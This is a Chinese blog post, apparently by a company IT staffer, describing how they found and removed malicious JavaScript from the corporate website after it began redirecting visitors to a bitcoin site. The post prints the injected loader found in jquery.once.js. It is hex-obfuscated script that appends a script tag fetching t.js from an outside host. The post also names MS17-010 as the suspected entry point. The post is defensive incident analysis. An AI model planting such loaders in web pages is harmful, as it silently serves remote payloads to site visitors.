记一次WebShell查杀事件

为了确保对外业务系统安全,我会经常浏览公司对外发布的业务系统、公司官网等,恰巧今天浏览官网发现了一处异常,在打开公司主页后,地址栏右侧提示一个窗口被拦截。当访问该拦截窗口后,弹出如下页面……..,很不幸,中招了!!!!!

为了减少影响,汇报给领导后第一件事情就是关停网站。进行事件分析,分析步骤如下:

一、分析页面请求

使用谷歌浏览器直接通过IP地址访问官网,F12调出网络分析工具,查看网络请求过程,请求过程如下,从下图中可以看到是执行了一个JS,然后跳转到http://sendbitcoin.email/比特币的网站。

二、分析JS代码

找到恶意JS了,但是如何找到JS代码在哪里呢?这个问题困扰了我很长时间,官网已经没有运维很多年了,没人对官网的代码、发布目录等情况有所了解,只能要来系统账号自己来查找了,查了好久根本就无法找到t.js文件,经过分析后终于找到了突破口,通过查看JS的调用过程可知是由jquery.once.js调用完成的。

三、查找恶意代码

打开jquery.once.js,发现如下一段可疑代码,代码内容如下

var RqLm1=window["x64x6fx63x75x6dx65x6ex74"]["x67x65x74x45x6cx65x6dx65x6ex74x73x42x79x54x61x67x4ex61x6dx65"]('x68x65x61x64')[0];var D2=window["x64x6fx63x75x6dx65x6ex74"]["x63x72x65x61x74x65x45x6cx65x6dx65x6ex74"]('x73x63x72x69x70x74');D2["x74x79x70x65"]='x74x65x78x74x2fx6ax61x76x61x73x63x72x69x70x74';D2["x69x64"]='x6dx5fx67x5fx61';D2["x73x72x63"]='x68x74x74x70x3ax2fx2fx76x75x75x77x64x2ex63x6fx6dx2fx74x2ex6ax73';RqLm1["x61x70x70x65x6ex64x43x68x69x6cx64"](D2);

对这段16进制编码进行在线解码(https://tool.lu/),解码后内容如下图,总算是找到最邪恶的代码了。

这就是公司官网感染webshell的一次查杀,由于部署该服务的服务器发布在官网,且存在MS17-010漏洞,初步怀疑是利用该漏洞进行的恶意代码植入,但是由于所有日志均已丢失,已无法完成完整的溯源了…….

相关推荐: 说一说:Sqlmap参数

简述: SQLMAP是一种开源渗透测试工具,可自动执行SQL注入缺陷的检测和开发过程,并接管数据库服务器。它有强大的检测引擎,针对不同类型的数据库提供多样的渗透测试功能选项,实现数据库识别、数据获取、访问DBMS操作系统甚至通过带外数据连接的方式执行操作系统的…






最后修改:2021 年 04 月 27 日 06 : 28 PM

© 版权声明
THE END
喜欢就支持一下吧
点赞0
分享
评论 抢沙发

请登录后发表评论